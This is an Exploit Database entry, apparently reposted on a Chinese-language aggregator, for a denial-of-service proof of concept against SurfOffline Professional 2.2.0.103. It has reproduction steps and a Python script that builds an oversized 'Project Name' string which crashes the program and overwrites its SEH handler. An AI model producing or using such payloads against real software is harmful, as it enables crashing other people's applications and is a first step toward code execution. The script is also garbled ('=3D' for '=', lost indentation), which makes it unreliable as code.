SurfOffline Professional 2.2.0.103 – ‘Project Name’ Denial of Service (SEH)

• Exploit Database
• 13 阅读

• 作者： Chris Inzinga
  日期： 2019-12-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47795/

• # Exploit Title: SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)
  # Date: 2019-12-18
  # Exploit Author: Chris Inzinga
  # Vendor Homepage: http://www.bimesoft.com/
  # Software Link: https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml
  # Version: 2.2.0.103
  # Tested on: Windows 7 SP1 (x86)
  
  # Steps to reproduce:
  # 1. Generate a malicious payload via the PoC
  # 2. In the application set the 'Start Page URL' to any value, it doesn't matter.
  # 3. Paste the PoC payload as the 'Project Name' and click 'next' and 'finish'.
  # 4. Observe a program DOS crash, overwriting SEH=20
  
  #!/usr/bin/python
  
  payload =3D "A" * 382 + "B" * 4 + "C" * 4
  
  try:
  fileCreate =3Dopen("exploit.txt","w")
  print("[x] Creating file")
  fileCreate.write(payload)
  fileCreate.close()
  print("[x] File created")
  except:
  print("[!] File failed to be created")